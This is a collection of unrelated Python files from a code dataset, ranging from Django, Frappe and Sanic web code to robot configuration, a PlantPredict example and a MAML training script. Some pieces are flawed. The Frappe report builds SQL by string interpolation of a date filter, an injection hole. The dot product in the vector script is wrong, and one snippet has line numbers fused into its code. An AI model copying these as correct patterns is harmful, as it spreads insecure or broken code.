def decorated(node, args, mirror=False):
self._config.add_relation(constructor, node, args, mirror)
return decorated
|
StarcoderdataPython
|
3261365
|
from django.db import models
class FeedTimetable(models.Model):
feed = models.ForeignKey('Feed')
timetable_url = models.URLField()
fetch_last_modified = models.CharField(max_length=50, blank=True, null=True)
last_processed_zip = models.CharField(max_length=50, blank=True, null=True)
active = models.BooleanField(default=True)
processed_watermark = models.DateTimeField(blank=True, null=True)
class Meta:
unique_together = ('feed', 'timetable_url')
def __str__(self):
return f'{self.feed.slug} - {self.timetable_url}'
|
StarcoderdataPython
|
3240161
|
<reponame>LINXNet/pyOCNOS
"""
This test module covers tests cases for function pyocnos.diff.normalize_tree()
"""
from lxml import etree
from pyocnos.diff import normalize_tree
def test_normalize_tree():
"""
Ensure normalize_tree() wipe off name spaces, prefixes, redundant white spaces and new lines.
"""
string = """
<data xmlns="http://www.company.com/TOOSchema/BarOS"
xmlns:a="http://www.company.com/TOOSchema/BarOS"
xmlns:b="http://www.company.com/TOOSchema/BarOS">
<snmp xmlns="http://www.company.com/TOOSchema/BarOS"> foo
</snmp>
<vr xmlns="http://www.company.com/TOOSchema/BarOS"></vr>
<a:logginglevel><loggingmodule>
bgp</loggingmodule> </a:logginglevel>
<interface>
</interface>
</data>
"""
tree_raw = etree.fromstring(string)
assert tree_raw.tag == '{http://www.company.com/TOOSchema/BarOS}data'
assert tree_raw[2].tag == '{http://www.company.com/TOOSchema/BarOS}logginglevel'
assert tree_raw[3].text == '\n '
tree_normalised = normalize_tree(string)
assert etree.tostring(tree_normalised).decode('utf-8') == \
'<data><snmp>foo</snmp><vr/><logginglevel><loggingmodule>bgp</loggingmodule></logginglevel><interface/></data>'
assert tree_normalised.tag == 'data'
assert tree_normalised[0].tag == 'snmp'
assert tree_normalised[1].tag == 'vr'
assert tree_normalised[2].tag == 'logginglevel'
|
StarcoderdataPython
|
1735386
|
<filename>MATH2021/matrix.py
#! /Library/Frameworks/Python.framework/Versions/3.9/bin/python3
# -*- coding: utf-8 -*-
print("Enter the vector: ")
a = [float(i) for i in input().strip().split(" ")]
b = [float(i) for i in input().strip().split(" ")]
if len(a) != len(b):
print("They are not in the same dimension")
quit()
dot_product = sum([i*j for i in a for j in b])
print("ab:", dot_product)
cross_product = [0, 0, 0]
cross_product[0] = a[1]*b[2] - a[2]*b[1]
cross_product[1] = a[2]*b[0] - a[0]*b[2]
cross_product[2] = a[0]*b[1] - a[1]*b[0]
print("axb: ", cross_product)
|
StarcoderdataPython
|
1778446
|
<reponame>hamzaali15/mjt
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import cint, flt, getdate
def execute(filters=None):
if not filters: filters = {}
if filters.from_date > filters.to_date:
frappe.throw(_("From Date must be before To Date"))
float_precision = cint(frappe.db.get_default("float_precision")) or 3
columns = get_columns(filters)
item_map = get_item_details(filters)
iwb_map = get_item_warehouse_batch_map(filters, float_precision)
data = []
for item in sorted(iwb_map):
if item and (not filters.get("item") or filters.get("item") == item):
for wh in sorted(iwb_map[item]):
for design in sorted(iwb_map[item][wh]):
qty_dict = iwb_map[item][wh][design]
print()
design_name = frappe.db.get_value('Design' , design , 'design')
if qty_dict.opening_qty or qty_dict.in_qty or qty_dict.out_qty or qty_dict.bal_qty:
data.append([item, item_map[item]["item_name"], item_map[item]["description"], wh, design, design_name,
flt(qty_dict.opening_qty, float_precision), flt(qty_dict.in_qty, float_precision),
flt(qty_dict.out_qty, float_precision), flt(qty_dict.bal_qty, float_precision),
item_map[item]["stock_uom"]
])
lst = []
# for res in data:
# print("-----------------res",res)
# try:
# l = res
# doc = frappe.get_doc("Batch",res[4])
# if doc:
# l.append(doc.supplier if doc.supplier else " ")
# if doc.supplier:
# sn = frappe.db.get_value("Supplier", doc.supplier, "supplier_name")
# l.append(sn if sn else " ")
# else:
# l.append(" ")
# l.append(doc.quality_code if doc.quality_code else " ")
# l.append(doc.quality_name if doc.quality_name else " ")
# lst.append(l)
# except:
# pass
return columns, data
def get_columns(filters):
"""return columns based on filters"""
columns = [_("Item") + ":Link/Item:100"] + [_("Item Name") + "::150"] + [_("Description") + "::150"] + \
[_("Warehouse") + ":Link/Warehouse:100"] + [_("Design") + ":Link/Design:100"] + [_("Design Name") + "::150"] + [_("Opening Qty") + ":Float:90"] + \
[_("In Qty") + ":Float:80"] + [_("Out Qty") + ":Float:80"] + [_("Balance Qty") + ":Float:90"] + \
[_("UOM") + "::90"]
# + [_("Party Code") + ":Data:100"] + [_("Party Name") + ":Data:100"] + \
# [_("Quality Code") + ":Data:100"] + [_("Quality Name") + ":Data:100"]
return columns
def get_conditions(filters):
conditions = ""
if not filters.get("from_date"):
frappe.throw(_("'From Date' is required"))
if filters.get("to_date"):
conditions += " and posting_date <= '%s'" % filters["to_date"]
else:
frappe.throw(_("'To Date' is required"))
for field in ["item_code", "warehouse", "design_no", "company"]:
if filters.get(field):
conditions += " and {0} = {1}".format(field, frappe.db.escape(filters.get(field)))
return conditions
# get all details
def get_stock_ledger_entries(filters):
conditions = get_conditions(filters)
result = frappe.db.sql("""
select item_code, design_no, design_name, warehouse, posting_date, sum(actual_qty) as actual_qty
from `tabStock Ledger Entry`
where docstatus < 2 and design_no is not null %s
group by voucher_no, design_no, item_code, warehouse
order by item_code, warehouse""" %
conditions, as_dict=1)
return result
def get_item_warehouse_batch_map(filters, float_precision):
sle = get_stock_ledger_entries(filters)
iwb_map = {}
from_date = getdate(filters["from_date"])
to_date = getdate(filters["to_date"])
for d in sle:
iwb_map.setdefault(d.item_code, {}).setdefault(d.warehouse, {})\
.setdefault(d.design_no, frappe._dict({
"opening_qty": 0.0, "in_qty": 0.0, "out_qty": 0.0, "bal_qty": 0.0
}))
qty_dict = iwb_map[d.item_code][d.warehouse][d.design_no]
if d.posting_date < from_date:
qty_dict.opening_qty = flt(qty_dict.opening_qty, float_precision) \
+ flt(d.actual_qty, float_precision)
elif d.posting_date >= from_date and d.posting_date <= to_date:
if flt(d.actual_qty) > 0:
qty_dict.in_qty = flt(qty_dict.in_qty, float_precision) + flt(d.actual_qty, float_precision)
else:
qty_dict.out_qty = flt(qty_dict.out_qty, float_precision) \
+ abs(flt(d.actual_qty, float_precision))
qty_dict.bal_qty = flt(qty_dict.bal_qty, float_precision) + flt(d.actual_qty, float_precision)
return iwb_map
def get_item_details(filters):
item_map = {}
for d in frappe.db.sql("select name, item_name, description, stock_uom from tabItem", as_dict=1):
item_map.setdefault(d.name, d)
return item_map
|
StarcoderdataPython
|
160869
|
<reponame>mrakitin/opentrons
from copy import deepcopy
import json
import logging
import os
from dataclasses import asdict
from pathlib import Path
from typing import Any, Dict, List, Union, Optional, TypeVar, cast
from opentrons.config import CONFIG
from opentrons.hardware_control.types import BoardRevision
from .types import CurrentDict, RobotConfig, AxisDict
log = logging.getLogger(__name__)
ROBOT_CONFIG_VERSION = 4
PLUNGER_CURRENT_LOW = 0.05
PLUNGER_CURRENT_HIGH = 0.05
MOUNT_CURRENT_LOW = 0.1
MOUNT_CURRENT_HIGH = 0.8
X_CURRENT_LOW = 0.3
X_CURRENT_HIGH = 1.25
Y_CURRENT_LOW = 0.3
Y_CURRENT_HIGH = 1.25
XY_CURRENT_LOW_REFRESH = 0.7
MOUNT_CURRENT_HIGH_REFRESH = 0.5
Z_RETRACT_DISTANCE = 2
HIGH_CURRENT: CurrentDict = {
'default': {
'X': X_CURRENT_HIGH,
'Y': Y_CURRENT_HIGH,
'Z': MOUNT_CURRENT_HIGH_REFRESH,
'A': MOUNT_CURRENT_HIGH_REFRESH,
'B': PLUNGER_CURRENT_HIGH,
'C': PLUNGER_CURRENT_HIGH
},
'2.1': {
'X': X_CURRENT_HIGH,
'Y': Y_CURRENT_HIGH,
'Z': MOUNT_CURRENT_HIGH,
'A': MOUNT_CURRENT_HIGH,
'B': PLUNGER_CURRENT_HIGH,
'C': PLUNGER_CURRENT_HIGH
}
}
LOW_CURRENT: CurrentDict = {
'default': {
'X': XY_CURRENT_LOW_REFRESH,
'Y': XY_CURRENT_LOW_REFRESH,
'Z': MOUNT_CURRENT_LOW,
'A': MOUNT_CURRENT_LOW,
'B': PLUNGER_CURRENT_LOW,
'C': PLUNGER_CURRENT_LOW
},
'2.1': {
'X': X_CURRENT_LOW,
'Y': Y_CURRENT_LOW,
'Z': MOUNT_CURRENT_LOW,
'A': MOUNT_CURRENT_LOW,
'B': PLUNGER_CURRENT_LOW,
'C': PLUNGER_CURRENT_LOW
}
}
DEFAULT_CURRENT: CurrentDict = {
'default': {
'X': HIGH_CURRENT['default']['X'],
'Y': HIGH_CURRENT['default']['Y'],
'Z': HIGH_CURRENT['default']['Z'],
'A': HIGH_CURRENT['default']['A'],
'B': LOW_CURRENT['default']['B'],
'C': LOW_CURRENT['default']['C']
},
'2.1': {
'X': HIGH_CURRENT['2.1']['X'],
'Y': HIGH_CURRENT['2.1']['Y'],
'Z': HIGH_CURRENT['2.1']['Z'],
'A': HIGH_CURRENT['2.1']['A'],
'B': LOW_CURRENT['2.1']['B'],
'C': LOW_CURRENT['2.1']['C']
}
}
X_MAX_SPEED = 600
Y_MAX_SPEED = 400
Z_MAX_SPEED = 125
A_MAX_SPEED = 125
B_MAX_SPEED = 40
C_MAX_SPEED = 40
DEFAULT_MAX_SPEEDS: AxisDict = {
'X': X_MAX_SPEED,
'Y': Y_MAX_SPEED,
'Z': Z_MAX_SPEED,
'A': A_MAX_SPEED,
'B': B_MAX_SPEED,
'C': C_MAX_SPEED
}
DEFAULT_CURRENT_STRING = ' '.join(
['{}{}'.format(key, value) for key, value in DEFAULT_CURRENT.items()])
DEFAULT_DECK_CALIBRATION_V2: List[List[float]] = [
[1.00, 0.00, 0.00],
[0.00, 1.00, 0.00],
[0.00, 0.00, 1.00]]
DEFAULT_SIMULATION_CALIBRATION: List[List[float]] = [
[1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, -25.0],
[0.0, 0.0, 0.0, 1.0]
]
X_ACCELERATION = 3000
Y_ACCELERATION = 2000
Z_ACCELERATION = 1500
A_ACCELERATION = 1500
B_ACCELERATION = 200
C_ACCELERATION = 200
DEFAULT_ACCELERATION: Dict[str, float] = {
'X': X_ACCELERATION,
'Y': Y_ACCELERATION,
'Z': Z_ACCELERATION,
'A': A_ACCELERATION,
'B': B_ACCELERATION,
'C': C_ACCELERATION
}
DEFAULT_PIPETTE_CONFIGS: Dict[str, float] = {
'homePosition': 220,
'stepsPerMM': 768,
'maxTravel': 30
}
DEFAULT_GANTRY_STEPS_PER_MM: Dict[str, float] = {
'X': 80.00,
'Y': 80.00,
'Z': 400,
'A': 400
}
DEFAULT_MOUNT_OFFSET = [-34, 0, 0]
DEFAULT_PIPETTE_OFFSET = [0.0, 0.0, 0.0]
SERIAL_SPEED = 115200
DEFAULT_LOG_LEVEL = 'INFO'
def _build_hw_versioned_current_dict(
from_conf: Optional[Dict[str, Any]], default: CurrentDict) -> CurrentDict:
if not from_conf or not isinstance(from_conf, dict):
return default
# special case: if this is a valid old (i.e. not model-specific) current
# setup, migrate it.
if 'default' not in from_conf and not (set('XYZABC')-set(from_conf.keys())):
new_dct = deepcopy(default)
# Because there's no case in which a machine with a more recent revision
# than 2.1 should have a valid and edited robot config when updating
# to this code, we should default it to 2.1 to avoid breaking other
# robots
new_dct['2.1'] = cast(AxisDict, from_conf)
return new_dct
return cast(CurrentDict, from_conf)
DictType = TypeVar('DictType', bound=Dict)
def _build_dict_with_default(
from_conf: Union[DictType, str, None], default: DictType) -> DictType:
if not isinstance(from_conf, dict):
return default
else:
return cast(DictType, from_conf)
def current_for_revision(
current_dict: CurrentDict,
revision: BoardRevision) -> AxisDict:
if revision == BoardRevision.UNKNOWN:
return current_dict.get('2.1', current_dict['default'])
elif revision.real_name() in current_dict:
return current_dict[revision.real_name()] # type: ignore
else:
return current_dict['default']
def build_config(robot_settings: Dict[str, Any]) -> RobotConfig:
return RobotConfig(
name=robot_settings.get('name', '<NAME>'),
version=ROBOT_CONFIG_VERSION,
gantry_steps_per_mm=_build_dict_with_default(
robot_settings.get('steps_per_mm'), DEFAULT_GANTRY_STEPS_PER_MM),
acceleration=_build_dict_with_default(
robot_settings.get('acceleration'), DEFAULT_ACCELERATION),
serial_speed=robot_settings.get('serial_speed', SERIAL_SPEED),
default_current=_build_hw_versioned_current_dict(
robot_settings.get('default_current'), DEFAULT_CURRENT),
low_current=_build_hw_versioned_current_dict(
robot_settings.get('low_current'), LOW_CURRENT),
high_current=_build_hw_versioned_current_dict(
robot_settings.get('high_current'), HIGH_CURRENT),
default_max_speed=robot_settings.get(
'default_max_speed', DEFAULT_MAX_SPEEDS),
log_level=robot_settings.get('log_level', DEFAULT_LOG_LEVEL),
default_pipette_configs=robot_settings.get(
'default_pipette_configs', DEFAULT_PIPETTE_CONFIGS),
z_retract_distance=robot_settings.get(
'z_retract_distance', Z_RETRACT_DISTANCE),
left_mount_offset=robot_settings.get(
'left_mount_offset', DEFAULT_MOUNT_OFFSET),
)
def config_to_save(
config: RobotConfig) -> Dict[str, Any]:
return asdict(config)
def load() -> RobotConfig:
settings_file = CONFIG['robot_settings_file']
log.debug("Loading robot settings from {}".format(settings_file))
robot_settings = _load_json(settings_file) or {}
return build_config(robot_settings)
def save_robot_settings(config: RobotConfig,
rs_filename: str = None,
tag: str = None):
config_dict = config_to_save(config)
# Save everything else in a different file
filename = rs_filename or CONFIG['robot_settings_file']
if tag:
root, ext = os.path.splitext(filename)
filename = "{}-{}{}".format(root, tag, ext)
_save_json(config_dict, filename=filename)
return config_dict
def backup_configuration(config: RobotConfig, tag: str = None) -> None:
import time
if not tag:
tag = str(int(time.time() * 1000))
save_robot_settings(config, tag=tag)
def get_legacy_gantry_calibration() -> Optional[List[List[float]]]:
"""
Returns the legacy gantry calibration if exists.
This should happen only if the new deck calibration file does not exist.
The legacy calibration should then be migrated to the new format.
"""
gantry_cal = _load_json(CONFIG['deck_calibration_file'])
if 'gantry_calibration' in gantry_cal:
return gantry_cal['gantry_calibration']
else:
return None
def clear() -> None:
_clear_file(CONFIG['robot_settings_file'])
def _clear_file(filename: Union[str, Path]) -> None:
log.debug('Deleting {}'.format(filename))
if os.path.exists(filename):
os.remove(filename)
# TODO: move to util (write a default load, save JSON function)
def _load_json(filename: Union[str, Path]) -> Dict[str, Any]:
try:
with open(filename, 'r') as file:
res = json.load(file)
except FileNotFoundError:
log.warning('{0} not found. Loading defaults'.format(filename))
res = {}
except json.decoder.JSONDecodeError:
log.warning('{0} is corrupt. Loading defaults'.format(filename))
res = {}
return res
def _save_json(data: Dict[str, Any], filename: Union[str, Path]) -> None:
try:
os.makedirs(os.path.dirname(filename), exist_ok=True)
with open(filename, 'w') as file:
json.dump(data, file, sort_keys=True, indent=4)
file.flush()
os.fsync(file.fileno())
except OSError:
log.exception('Write failed with exception:')
|
StarcoderdataPython
|
1728126
|
<reponame>plantpredict/python-sdk
"""This file contains the code for "Generate a module file from module datasheet" in the "Example Usage" section of the
documentation located at https://plantpredict-python.readthedocs.io."""
import plantpredict
from plantpredict.enumerations import CellTechnologyTypeEnum, PVModelTypeEnum, ConstructionTypeEnum
# authenticate using API credentials
api = plantpredict.Api(
username="insert username here",
password="<PASSWORD>",
client_id="insert client_id here",
client_secret="insert client_secret here"
)
# instantiate a local Module object
module = api.module()
# assign basic module parameters from the manufacturer's datasheet or similar data source
module.cell_technology_type = CellTechnologyTypeEnum.CDTE
module.number_of_cells_in_series = 264
module.pv_model = PVModelTypeEnum.ONE_DIODE_RECOMBINATION
module.reference_temperature = 25
module.reference_irradiance = 1000
module.stc_max_power = 430.0
module.stc_short_circuit_current = 2.54
module.stc_open_circuit_voltage = 219.2
module.stc_mpp_current = 2.355
module.stc_mpp_voltage = 182.55
module.stc_power_temp_coef = -0.32
module.stc_short_circuit_current_temp_coef = 0.04
module.stc_open_circuit_voltage_temp_coef = -0.28
# generate single diode parameters using the default algorithm/assumptions
# (see https://plantpredict.com/algorithm/module-file-generator/ for more information)
module.generate_single_diode_parameters_default()
# at this point, the user could simply add the remaining required fields and save the new Module. alternatively, the
# user can tune the module's single diode parameters to achieve (close to) a desired effective irradiance
# response (EIR)/low-light performance. the first step is to define target relative efficiencies at specified
# irradiance
module.effective_irradiance_response = [
{'temperature': 25, 'irradiance': 1000, 'relative_efficiency': 1.0},
{'temperature': 25, 'irradiance': 800, 'relative_efficiency': 1.0029},
{'temperature': 25, 'irradiance': 600, 'relative_efficiency': 1.0003},
{'temperature': 25, 'irradiance': 400, 'relative_efficiency': 0.9872},
{'temperature': 25, 'irradiance': 200, 'relative_efficiency': 0.944}
]
# how a user tunes the module's performance is relatively open-ended, but a good place to start is using
# PlantPredict's "Optimize Series Resistance" algorithm (see https://plantpredict.com/algorithm/module-file-generator/
# for more information). this will automatically change the series resistance to generate an EIR closer to the target.
module.optimize_series_resistance()
# at any point the user can check the current model-calculated EIR to compare it to the target
calculated_effective_irradiance_response = module.calculate_effective_irradiance_response()
# additionally, an IV curve can be generated for the module for reference
iv_curve_at_stc = module.generate_iv_curve(num_iv_points=250)
# the initial series resistance optimization might not achieve an EIR close enough to the target. the user can modify
# any parameter, re-optimize series resistance or just recalculate dependent parameters, and check EIR repeatedly.
# this is the open-ended portion of module file generation. Important Note: after modifying parameters, if the user
# does not re-optimize series resistance, the "generate_single_diode_parameters_advanced" method must be called to
# re-calculate saturation_current_at_stc, diode_ideality_factor_at_stc, light_generated_current, and
# linear_temperature_dependence_on_gamma.
module.shunt_resistance_at_stc = 8000
module.dark_shunt_resistance = 9000
module.generate_single_diode_parameters_advanced()
new_eir = module.calculate_effective_irradiance_response()
# once the user is satisfied with the module parameters and performance, assign other required fields
module.name = "Test Module"
module.model = "Test Module"
module.manufacturer = "Solar Company"
module.length = 2009
module.width = 1232
module.heat_absorption_coef_alpha_t = 0.9
module.construction_type = ConstructionTypeEnum.GLASS_GLASS
# create module in the PlantPredict database
module.create()
|
StarcoderdataPython
|
171230
|
# pylint: disable=missing-module-docstring
#
# Copyright (C) 2022 by YadavGulshan@Github, < https://github.com/YadavGulshan >.
#
# This file is part of < https://github.com/Yadavgulshan/pharmaService > project,
# and is released under the "BSD 3-Clause License Agreement".
# Please see < https://github.com/YadavGulshan/pharmaService/blob/master/LICENCE >
#
# All rights reserved.
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from rest_framework.decorators import permission_classes
from pharmacy.api.serializers import MedicineSerializer
from pharmacy.models import Medical, Medicine
@permission_classes([IsAuthenticated])
class DisplayNearbyMedicineSearchedByUser(APIView):
"""
This class will use distance api endpoint
and check for lat and long of medicals listed and then it will show them
"""
def post(self, request):
"""
This method will check the request for given pincode and will throw the medicals having pincode similar to request
"""
pincode = request.data.get("pincode")
name = request.data.get("name")
medicineMedical = Medicine.objects.filter(name__contains=name)
# Now we have to check for the pincode of the medicals and then we will show the medicals
# which are near to the user
medical = []
for med in medicineMedical:
id = med.medicalId
# print("search func: ", id.name)
# print(Medical.objects.get(pincode=id.pincode))
# Look for id in medical model
# and then check for the pincode
result = Medical.objects.filter(pincode=id.pincode).filter(
pincode__contains=pincode
)
# print("result: ", result)
if result:
medical.append(med)
serializer = MedicineSerializer(medical, many=True)
return Response(serializer.data, status=200)
|
StarcoderdataPython
|
20087
|
class Solution:
2 def solve(self, matrix):
3 from functools import lru_cache
4 @lru_cache(None)
5 def dp(i, j):
6 if i < 0 or j < 0:
7 return 0
8 return max(dp(i - 1, j), dp(i, j - 1)) + matrix[i][j]
9 return dp(len(matrix) - 1, len(matrix[0]) - 1)
|
StarcoderdataPython
|
3308956
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The controller used to search hyperparameters or neural architecture"""
import copy
import math
import numpy as np
import paddle.fluid as fluid
__all__ = ['EvolutionaryController', 'RLBaseController']
class EvolutionaryController(object):
"""Abstract controller for all evolutionary searching method.
"""
def update(self, tokens, reward):
"""Update the status of controller according current tokens and reward.
Args:
tokens(list<int>): A solution of searching task.
reward(list<int>): The reward of tokens.
"""
raise NotImplementedError('Abstract method.')
def reset(self, range_table, constrain_func=None):
"""Reset the controller.
Args:
range_table(list<int>): It is used to define the searching space of controller.
The tokens[i] generated by controller should be in [0, range_table[i]).
constrain_func(function): It is used to check whether tokens meet the constraint.
None means there is no constraint. Default: None.
"""
raise NotImplementedError('Abstract method.')
def next_tokens(self):
"""Generate new tokens.
Returns:
list<list>: The next searched tokens.
"""
raise NotImplementedError('Abstract method.')
class RLBaseController(object):
""" Base Controller for reforcement learning"""
def next_tokens(self, *args, **kwargs):
raise NotImplementedError('Abstract method.')
def update(self, *args, **kwargs):
raise NotImplementedError('Abstract method.')
def save_controller(self, program, output_dir):
fluid.save(program, output_dir)
def load_controller(self, program, load_dir):
fluid.load(program, load_dir)
def get_params(self, program):
var_dict = {}
for var in program.global_block().all_parameters():
var_dict[var.name] = np.array(fluid.global_scope().find_var(
var.name).get_tensor())
return var_dict
def set_params(self, program, params_dict, place):
for var in program.global_block().all_parameters():
fluid.global_scope().find_var(var.name).get_tensor().set(
params_dict[var.name], place)
|
StarcoderdataPython
|
3253571
|
from sanic import response
from sanic import Blueprint
from .helpers import auth_route, user_to_json, validate
from .errors import ApiError, Unauthorized, UnknownUser
from .schemas import USERMOD_SCHEMA
from .auth import check_password
bp = Blueprint(__name__)
@bp.route('/api/users/@me')
@auth_route
async def get_me(user, br, request):
"""Get the current user."""
return response.json(user_to_json(user))
@bp.route('/api/users/<user_id:int>')
@auth_route
async def get_user(user, br, request, user_id):
"""Get any user."""
if user.bot:
raise Unauthorized('Users can not use this endpoint')
other = await br.get_user(user_id)
if not other:
raise UnknownUser('User not found')
return response.json(other.json)
@bp.patch('/api/users/@me')
@auth_route
async def patch_me(user, br, request):
"""Modify current user."""
payload = validate(request.json, USERMOD_SCHEMA)
result_user = dict(user)
new_username = payload.get('username')
if new_username and new_username != user['username']:
# proceed for a new discrim
new_discrim = br.generate_discrim(new_username)
await br.pool.execute("""
update users
set discriminator=$1, username=$2
where id=$3
""", new_discrim, new_username, user['id'])
result_user['discriminator'] = new_discrim
result_user['username'] = new_username
new_avatar = payload.get('avatar')
if new_avatar:
await br.pool.execute("""
update users
set avatar=$1
where id=$2
""", new_avatar, user['id'])
result_user['avatar'] = new_avatar
new_email = payload.get('email')
given_password = payload.get('password')
if new_email and new_email != user['email']:
check_password(user, given_password)
result_user['email'] = new_email
# TODO: new_password
return response.json(result_user)
@bp.route('/api/users/@me/guilds')
@auth_route
async def get_me_guilds(user, br, request):
# TODO: query string parameters
guild_list = await br.get_guilds(user.id)
return response.json([g.json for g in guild_list])
@bp.route('/api/users/@me/guilds/<guild_id:int>', methods=['DELETE'])
@auth_route
async def leave_guild(user, br, request, guild_id):
guild = await br.get_user_guild(user.id, guild_id)
if not guild:
return response.text('Guild not found', status=404)
try:
await br.pop_member(guild, user)
except br.MemberError as err:
raise ApiError(f'error removing user: {err!r}')
return response.text('', status=204)
|
StarcoderdataPython
|
3244537
|
<filename>bluespot/guest/const.py
SESSION_INIT = 1
SESSION_AUTHORIZED = 3
SESSION_EXPIRED = 4
SESSION_BAN = 5
GUESTRACK_INIT = 1 #Guesttrack creation
GUESTRACK_SESSION = 2 #guesttrack is assigned a session
GUESTRACK_NO_AUTH = 3 #guest track of no_auth site
GUESTRACK_TEMP_AUTH = 4 #guesttrack authorization started
GUESTRACK_NEW_AUTH = 5 #newly authorized guest track
GUESTRACK_SOCIAL_PREAUTH= 6 #guesttrack devices previously authorized
DEVICE_INIT = 1
DEVICE_AUTH = 2
DEVICE_SMS_AUTH = 3
DEVICE_BAN = 4
GUEST_INIT = 1
GUEST_AUTHORIZED = 2
GUEST_BANNED = 3
form_fields_dict = { 'firstname':"Firstname",'lastname':'<NAME>','email':'Email ID','phonenumber':'Phone Number'}
|
StarcoderdataPython
|
29191
|
<reponame>engcristian/Python
'''
Arithmetic progression with 10 elements.
'''
first_term = int(input('Type the first term of this A.P: '))
reason = int(input('Type the reason of this A.P: '))
last_term = first_term + (50-1)*reason # A.P formula
for c in range (first_term, last_term + reason , reason):
print(c, end=' ► ')
|
StarcoderdataPython
|
44751
|
"""
Usage Instructions:
10-shot sinusoid:
python main.py --datasource=sinusoid --logdir=logs/sine/ --metatrain_iterations=70000 --norm=None --update_batch_size=10
10-shot sinusoid baselines:
python main.py --datasource=sinusoid --logdir=logs/sine/ --pretrain_iterations=70000 --metatrain_iterations=0 --norm=None --update_batch_size=10 --baseline=oracle
python main.py --datasource=sinusoid --logdir=logs/sine/ --pretrain_iterations=70000 --metatrain_iterations=0 --norm=None --update_batch_size=10
5-way, 1-shot omniglot:
python main.py --datasource=omniglot --metatrain_iterations=60000 --meta_batch_size=32 --update_batch_size=1 --update_lr=0.4 --num_updates=1 --logdir=logs/omniglot5way/
20-way, 1-shot omniglot:
python main.py --datasource=omniglot --metatrain_iterations=60000 --meta_batch_size=16 --update_batch_size=1 --num_classes=20 --update_lr=0.1 --num_updates=5 --logdir=logs/omniglot20way/
5-way 1-shot mini imagenet:
python main.py --datasource=miniimagenet --metatrain_iterations=60000 --meta_batch_size=4 --update_batch_size=1 --update_lr=0.01 --num_updates=5 --num_classes=5 --logdir=logs/miniimagenet1shot/ --num_filters=32 --max_pool=True
5-way 5-shot mini imagenet:
python main.py --datasource=miniimagenet --metatrain_iterations=60000 --meta_batch_size=4 --update_batch_size=5 --update_lr=0.01 --num_updates=5 --num_classes=5 --logdir=logs/miniimagenet5shot/ --num_filters=32 --max_pool=True
To run evaluation, use the '--train=False' flag and the '--test_set=True' flag to use the test set.
For omniglot and miniimagenet training, acquire the dataset online, put it in the correspoding data directory, and see the python script instructions in that directory to preprocess the data.
Note that better sinusoid results can be achieved by using a larger network.
"""
import csv
import numpy as np
import pickle
import random
import tensorflow as tf
import matplotlib.pyplot as plt
from data_generator import DataGenerator
from maml import MAML
from tensorflow.python.platform import flags
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
FLAGS = flags.FLAGS
## Dataset/method options
flags.DEFINE_string('datasource', 'sinusoid', 'sinusoid or omniglot or miniimagenet')
flags.DEFINE_integer('num_classes', 5, 'number of classes used in classification (e.g. 5-way classification).')
# oracle means task id is input (only suitable for sinusoid)
# flags.DEFINE_string('baseline', "oracle", 'oracle, or None')
flags.DEFINE_string('baseline', None, 'oracle, or None')
## Training options
flags.DEFINE_integer('pretrain_iterations', 0, 'number of pre-training iterations.')
flags.DEFINE_integer('metatrain_iterations', 15000, 'number of metatraining iterations.') # 15k for omniglot, 50k for sinusoid
flags.DEFINE_integer('meta_batch_size', 25, 'number of tasks sampled per meta-update')
flags.DEFINE_float('meta_lr', 0.001, 'the base learning rate of the generator')
flags.DEFINE_integer('update_batch_size', 5, 'number of examples used for inner gradient update (K for K-shot learning).')
flags.DEFINE_float('update_lr', 1e-3, 'step size alpha for inner gradient update.') # 0.1 for omniglot
# flags.DEFINE_float('update_lr', 1e-2, 'step size alpha for inner gradient update.') # 0.1 for omniglot
flags.DEFINE_integer('num_updates', 1, 'number of inner gradient updates during training.')
## Model options
flags.DEFINE_string('norm', 'batch_norm', 'batch_norm, layer_norm, or None')
flags.DEFINE_integer('num_filters', 64, 'number of filters for conv nets -- 32 for miniimagenet, 64 for omiglot.')
flags.DEFINE_bool('conv', True, 'whether or not to use a convolutional network, only applicable in some cases')
flags.DEFINE_bool('max_pool', False, 'Whether or not to use max pooling rather than strided convolutions')
flags.DEFINE_bool('stop_grad', False, 'if True, do not use second derivatives in meta-optimization (for speed)')
flags.DEFINE_float('keep_prob', 0.5, 'if not None, used as keep_prob for all layers')
flags.DEFINE_bool('drop_connect', True, 'if True, use dropconnect, otherwise, use dropout')
# flags.DEFINE_float('keep_prob', None, 'if not None, used as keep_prob for all layers')
## Logging, saving, and testing options
flags.DEFINE_bool('log', True, 'if false, do not log summaries, for debugging code.')
flags.DEFINE_string('logdir', '/tmp/data', 'directory for summaries and checkpoints.')
flags.DEFINE_bool('resume', False, 'resume training if there is a model available')
flags.DEFINE_bool('train', True, 'True to train, False to test.')
flags.DEFINE_integer('test_iter', -1, 'iteration to load model (-1 for latest model)')
flags.DEFINE_bool('test_set', False, 'Set to true to test on the the test set, False for the validation set.')
flags.DEFINE_integer('train_update_batch_size', -1, 'number of examples used for gradient update during training (use if you want to test with a different number).')
flags.DEFINE_float('train_update_lr', -1, 'value of inner gradient step step during training. (use if you want to test with a different value)') # 0.1 for omniglot
def train(model, saver, sess, exp_string, data_generator, resume_itr=0):
SUMMARY_INTERVAL = 100
SAVE_INTERVAL = 1000
if FLAGS.datasource == 'sinusoid':
PRINT_INTERVAL = 1000
TEST_PRINT_INTERVAL = PRINT_INTERVAL*5
else:
PRINT_INTERVAL = 100
TEST_PRINT_INTERVAL = PRINT_INTERVAL*5
if FLAGS.log:
train_writer = tf.summary.FileWriter(FLAGS.logdir + '/' + exp_string, sess.graph)
print('Done initializing, starting training.')
prelosses, postlosses = [], []
num_classes = data_generator.num_classes # for classification, 1 otherwise
multitask_weights, reg_weights = [], []
for itr in range(resume_itr, FLAGS.pretrain_iterations + FLAGS.metatrain_iterations):
feed_dict = {}
if 'generate' in dir(data_generator):
